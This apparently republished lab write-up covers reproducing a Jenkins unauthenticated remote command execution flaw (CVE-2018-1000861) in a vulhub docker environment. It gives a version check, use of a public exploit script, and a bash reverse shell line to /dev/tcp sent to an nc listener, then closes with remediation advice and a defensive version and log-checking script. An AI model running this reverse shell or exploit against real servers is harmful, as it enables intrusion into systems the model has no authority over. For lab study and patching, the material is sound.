
Example Analysis of remote Command execution vulnerability in Jenkins

2025-01-19 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

This article shares an example analysis of a Jenkins remote command execution vulnerability. The editor considers it very practical and shares it as a reference; follow along below.

0x00 Introduction

Jenkins automates repetitive tasks such as integration, testing and deployment, and tool-driven integration is clearly more efficient than manual operation. Continuous integration also surfaces code changes earlier, so testing starts earlier and problems are found earlier, which significantly lowers the cost of fixing them: it shortens the path from development through integration, testing and deployment, removes the waiting time between those stages, and means that development, integration, testing and deployment can all proceed continuously.

0x01 Vulnerability overview

Jenkins is built on the Stapler web framework, which routes a URL path to a public Java method. Because this routing is not restricted, an attacker can construct special paths that reach sensitive Java methods, and many useful exploit chains can be found through this flaw. The most serious one bypasses the Groovy sandbox and lets an unauthenticated user execute arbitrary commands: before running a Groovy script in the sandbox, Jenkins first checks the script for errors, and that check runs outside the sandbox, so an attacker can execute arbitrary commands during this check step through meta-programming.

0x02 Scope of impact

2.153 and earlier

LTS 2.138.3 and earlier

0x03 Environment setup

1. The lab environment for this experiment is built with docker from vulhub. Vulhub download address:

https://github.com/vulhub/vulhub

2. Then install docker in the virtual machine, together with the docker-compose command. Please look up the installation steps yourself.

3. After the download completes and the virtual machine is set up, enter the directory for this vulnerability:

cd vulhub-master/jenkins/CVE-2018-1000861/

4. Run the vulnerable environment with:

docker-compose up -d

5. Once the environment has started, visit http://your-ip:8080 to see a Jenkins instance that has already been initialized.

0x04 Vulnerability reproduction

1. Use the following command to view the target's version:

curl -s -I http://your-ip:8080 | grep X-Jenkins

2. Since this vulnerability produces no output (no echo), use the exploit (exp) published on GitHub to execute commands. Note: you can also capture the request with Burp.

Exp download address: https://github.com/orangetw/awesome-jenkins-rce-2019

After the download completes, use python2 to check for the vulnerability: python2 exp.py http://your-ip:8080 "curl dnslog"

3. Since this vulnerability has no echo, use a reverse shell. // Note: the reverse shell command must be base64-encoded.

bash -i >& /dev/tcp/your-ip/port 0>&1

Base64 payload encoder: http://www.jackson-t.ca/runtime-exec-payloads.html

3.1 Then listen on the shell's IP and port with nc, and send the encoded shell command using the exp.

Summary

1. Reproducing this vulnerability requires a docker environment and the ability to use basic docker commands.

2. You also need to know the relevant linux commands and the syntax of a linux reverse shell.

0x05 Remediation recommendations

1. Upgrade to the latest version or apply the relevant patches.

2. Avoid exposing Jenkins to the public Internet.

3. Restrict access by IP.
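To support the recommendations above, the following added example (not code from the article, vulhub or the exploit repository) checks an X-Jenkins header value against the affected ranges from section 0x02 and flags access-log requests to a descriptor "checkScript" route, the form-validation step that section 0x01 says runs outside the Groovy sandbox. The route pattern and the common-log-format lines are assumptions; the log lines are constructed, not real traffic.

```python
import re
from typing import List, Tuple

# Affected ranges as stated in section 0x02; LTS versions have three components.
WEEKLY_LAST_AFFECTED = (2, 153)
LTS_LAST_AFFECTED = (2, 138, 3)

# Assumed route shape: a descriptor's checkScript* form-validation method.
CHECK_SCRIPT_ROUTE = re.compile(r"/descriptorByName/[^/\s?]+/checkScript\w*")

# Common log format: ip ident user [time] "METHOD path proto" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample access-log lines (not real traffic).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [31/May/2019:10:01:02 +0000] "GET /login HTTP/1.1" 200 1234
10.0.0.9 - - [31/May/2019:10:01:07 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile HTTP/1.1" 200 0
"""


def parse_jenkins_version(header_value: str) -> Tuple[int, ...]:
    """Turn an X-Jenkins header value such as '2.138.3' into a comparable tuple."""
    parts = header_value.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected X-Jenkins value: {header_value!r}")
    return tuple(int(p) for p in parts)


def is_affected(header_value: str) -> bool:
    """True if the version falls inside the affected range for its release line."""
    version = parse_jenkins_version(header_value)
    if len(version) == 3:  # LTS line, e.g. 2.138.3 or 2.150.1
        return version <= LTS_LAST_AFFECTED
    if len(version) == 2:  # weekly line, e.g. 2.153 or 2.154
        return version <= WEEKLY_LAST_AFFECTED
    raise ValueError(f"cannot classify Jenkins version {header_value!r}")


def find_check_script_hits(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, method, path) for every request to a checkScript* route."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m and CHECK_SCRIPT_ROUTE.search(m.group(3)):
            hits.append((m.group(1), m.group(2), m.group(3)))
    return hits


if __name__ == "__main__":
    for v in ("2.153", "2.154", "2.138.3", "2.150.1"):
        print(v, "affected" if is_affected(v) else "not affected")
    for ip, method, path in find_check_script_hits(SAMPLE_ACCESS_LOG):
        print(f"review: {ip} {method} {path}")
```

Requests to such routes from unexpected clients are worth correlating with the version check, since a patched instance still logs the request but no longer executes the script during validation.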

Thank you for reading! This is the end of this article on "example analysis of Jenkins remote command execution vulnerabilities". I hope the content above is helpful and lets you learn something new; if you think the article is good, share it so more people can see it!
